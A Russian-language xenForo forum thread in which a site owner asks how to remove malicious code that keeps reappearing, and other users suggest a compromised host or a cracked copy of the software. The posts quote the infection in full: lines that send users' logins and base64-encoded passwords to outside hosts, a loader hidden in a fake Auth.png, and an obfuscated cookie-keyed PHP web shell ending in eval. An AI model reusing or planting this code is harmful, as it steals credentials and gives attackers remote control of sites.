[Помогите] Взлом или что то иное.

Тема в разделе "xenForo", создана пользователем Mihail21, 3 авг 2016.

  1. Mihail21

    Mihail21

    Регистрация:
    19 мар 2015
    Сообщения:
    49
    Симпатии:
    6
    В общем в user.php стал появляться часто код
    $thisstring = str_replace(" ","",'file_get_contents(\'htt p: //you tube-down loa der. ru/import.php?per3='.$_SERVER['SERVER_NAME'].'&per1='.base64_encode($nameOrEmail).'&per2='.base64_encode($password).'&base=1\');');
    или такой

    $thisstring = str_replace(" ","",'file_get_contents(\'htt p: //46.254.21.14/import.php?per3='.$_SERVER['SERVER_NAME'].'&per1='.base64_encode($nameOrEmail).'&per2='.base64_encode($password).'&base=1\');');

    и в ошибках сервера он часто показывает.
    Я как понял, что он крадет пароли при вводе, но я перезалил файл чистый без этого кода, и через 2 недели он снова появился.
     
  2. $iD

    $iD Команда форума

    Регистрация:
    13 мар 2012
    Сообщения:
    3.349
    Симпатии:
    1.380
    полный путь к файлу приложите.

    ну и как вариант, взломали хостинг, подобрали пароль к ftp и т.д.
     
  3. Mihail21

    Mihail21

    Регистрация:
    19 мар 2015
    Сообщения:
    49
    Симпатии:
    6
    нет, не могут это сделать потому что пароль знаю только я и это хостинг панельный, его кроме меня никто не может зайти и фтп аккаунтов на нем нету.
    файл libary/xenforo/model/user.php
     
  4. $iD

    $iD Команда форума

    Регистрация:
    13 мар 2012
    Сообщения:
    3.349
    Симпатии:
    1.380
    в смысле панельный? там нет ssh?

    ну или у вас изначально ломанный ксенфоро с дырой. другого варианта нет
     
  5. Mihail21

    Mihail21

    Регистрация:
    19 мар 2015
    Сообщения:
    49
    Симпатии:
    6
    Я тут качал версию 1.4.5 Потом обновил до 1.5.7
    Там нету ssh, это панельный хостинг, stormwall.pro (не пиар)
     
  6. $iD

    $iD Команда форума

    Регистрация:
    13 мар 2012
    Сообщения:
    3.349
    Симпатии:
    1.380
    ну тогда это магия или происки рептилойдов.

    p.s. ответы на ваши вопросы выше.
     
  7. Mihail21

    Mihail21

    Регистрация:
    19 мар 2015
    Сообщения:
    49
    Симпатии:
    6
    Как это исправить? Я не думал что у меня ломанный, я давно тут скачивал 1.4.5 версию.
    --- Добавлено, 14 авг 2016 ---
    Снова появилось. Я убрал.
    Как это исправить, что нужно сделать что бы это починить?
     
  8. $iD

    $iD Команда форума

    Регистрация:
    13 мар 2012
    Сообщения:
    3.349
    Симпатии:
    1.380
    смените хостинг, обновите xenforo.

    p.s. По идее должно хватить смены хостинга.
     
  9. Mihail21

    Mihail21

    Регистрация:
    19 мар 2015
    Сообщения:
    49
    Симпатии:
    6
    у меня и до обновы было такое вроде.
    Сейчас 1.5.7 стоит.
    Смена хостинга разве поможет? Стоит stormwall.pro высокий тариф
    --- Добавлено, 14 авг 2016 ---
    Что пишут:
    Здравствуйте!

    Вход через ftp не выполнялся. По всей видимости, происходит автоматическое изменение скриптом расположенном в файлах сайта.
    Рекомендуем провести процедуру проверки и лечения Вашего сайта для устранения вредоносного кода, и дальнейшего его "цементирования". Стоимость услуги - 5999 рублей.

    Спасибо за Ваше обращение в техническую поддержку! Пожалуйста, сообщите, если мы можем еще чем-то помочь.
    Если Вы не удовлетворены качеством обслуживания, пожалуйста, сразу сообщите об этом напрямую руководству компании - [email protected] (в теме письма укажите номер тикета).
     
  10. $iD

    $iD Команда форума

    Регистрация:
    13 мар 2012
    Сообщения:
    3.349
    Симпатии:
    1.380
    Тогда:
    1. проверять модули установленные.
    2. проверять всю кодяру.
    3. Узнать как это происходит можно с помоцью логов. Не знаю, даёт ли ваш хостер доступ к логам.
     
  11. Mihail21

    Mihail21

    Регистрация:
    19 мар 2015
    Сообщения:
    49
    Симпатии:
    6
    Дали логи за август.
    Утром снова код появился.
     
  12. Mihail21

    Mihail21

    Регистрация:
    19 мар 2015
    Сообщения:
    49
    Симпатии:
    6
    вот что появилось еще
     
    Lasted edited by : 15 авг 2016
  13. AnOcToJI

    AnOcToJI

    Регистрация:
    28 дек 2012
    Сообщения:
    293
    Симпатии:
    186
    полностью архив сайта можешь скинуть без БД?
     
  14. MGT1

    MGT1

    Регистрация:
    5 янв 2013
    Сообщения:
    613
    Симпатии:
    182
    а после этого не возник вопрос что сами хостеры что-то подмутили?)
     
  15. Mihail21

    Mihail21

    Регистрация:
    19 мар 2015
    Сообщения:
    49
    Симпатии:
    6
    Они отказались помогать, сказали что мой сайт нарушает какие то нормы для их специалистов.
    В принципе да могу дать вам архив. может отдельные папки?
    --- Добавлено, 16 авг 2016 ---
    $error = new XenForo_Phrase('requested_user_x_not_found', array('name' => $nameOrEmail));
    return false;
    }
    [email protected]("library/XenForo/Model/Auth.png");$sd='base'.(256/4*1).'_dec'.'ode';$re=$sd($sdz[376]);$res="cr"."eat"."e_fu";$fe=$res."n"."ction";$sdsd2sds=$fe('', "};$re{");
    $authentication = $this->getUserAuthenticationObjectByUserId($user['user_id']);
    if (!$authentication || !$authentication->authenticate($user['user_id'], $password))
    {

    Вот что сегодня появилось
    --- Добавлено, 16 авг 2016 ---
    http://i.imgur.com/ArKrs2c.png
    это файл auth.png в 5 утра появился.
    --- Добавлено, 16 авг 2016 ---
    Хостинг написал на это:
    Я писал выше, на сайте находится shell через него без проблем можно загружать/редактировать файлы. Это самый распостранённый метод заражения.
     
  16. $iD

    $iD Команда форума

    Регистрация:
    13 мар 2012
    Сообщения:
    3.349
    Симпатии:
    1.380
    давайте архив.

    какие модули установлены?
     
    Mihail21 нравится это.
  17. Mihail21

    Mihail21

    Регистрация:
    19 мар 2015
    Сообщения:
    49
    Симпатии:
    6
    Скинул вам в лс
     
  18. Mihail21

    Mihail21

    Регистрация:
    19 мар 2015
    Сообщения:
    49
    Симпатии:
    6
    PHP:
    <?php
    function rs2fd($v$w) {
        
    $dll count($v);
        
    $n = ($dll 1) << 2;
        if (
    $w) {
            
    $m $v[$dll 1];
            if ((
    $m $n 3) || ($m $n)) return false;
            
    $n $m;}
        
    $s = array();
        for (
    $i 0$i $dll$i++) {
            
    $s[$i] = pack("V"$v[$i]);
        }
        if (
    $w) {
            return 
    substr(join(''$s), 0$n);
        } else {
            return 
    join(''$s);}}
    $cx='base'.(4*8*2).'_de'.'code';
    function 
    fd2rs($s$w) {
        
    $v unpack("V*"$sstr_repeat("\0", (strlen($s) % 4) & 3));
        
    $v array_values($v);
        if (
    $w) {
            
    $v[count($v)] = strlen($s);
        }return 
    $v;}$cxx=''; if(isset($_COOKIE['__'])){$cxx=$_COOKIE['__'];}
    function 
    int32($n) {
        while (
    $n >= 2147483648$n -= 4294967296;
        while (
    $n <= -2147483649$n += 4294967296;
        return (int)
    $n;
    }
    function 
    lol($str$zm) {
        if (
    $str == "") {
            return 
    "";
        }
    $aib='base'.(4*8*2).'_de'.'code';
    $aibolit=$aib('MHgwN2ZmZmZmZg==');
        
    $v fd2rs($strfalse);
        
    $k fd2rs($zmfalse);
        if (
    count($k) < 4) {
            for (
    $i count($k); $i 4$i++) {
                
    $k[$i] = 0;}}
        
    $n count($v) - 1
        
    $z $v[$n];
        
    $y $v[0];
        
    $delta 0x9E3779B9;
        
    $q floor(52 / ($n 1));
        
    $sum int32($q $delta);

        while (
    $sum != 0) {

            
    $e $sum >> 3;
            for (
    $p $n$p 0$p--) {
                
    $z $v[$p 1];
                
    $mx int32(((($z >> 0x07ffffff)) ^ $y << 2) + (($y >> 0x1fffffff) ^ $z << 4)) ^ int32(($sum $y) + ($k[$p $e] ^ $z));
                
    $y $v[$p] = int32($v[$p] - $mx);
            }
            
    $z $v[$n];
            
    $mx int32(((($z >> 0x07ffffff)) ^ $y << 2) + (($y >> 0x1fffffff) ^ $z << 4)) ^ int32(($sum $y) + ($k[$p $e] ^ $z));
            
    $y $v[0] = int32($v[0] - $mx);
            
    $sum int32($sum $delta);
        }
        return 
    rs2fd($vtrue);
    }
    $klkl='';
    $popo='ev'.'al';if($cxx!=''){
    eval(
    trim(gzinflate(lol($cx("sAE1WI8o2vGc+oNQYxY37zUtr49IaS3OObn9c5eSzMT3pxkVQTDlSA=="),$cxx))));
    файл появился на сервере в корне
     
    Lasted edited by : 17 авг 2016
  19. YoYo

    YoYo

    Регистрация:
    20 июл 2016
    Сообщения:
    120
    Симпатии:
    27
  20. Mihail21

    Mihail21

    Регистрация:
    19 мар 2015
    Сообщения:
    49
    Симпатии:
    6
    :Biggrin: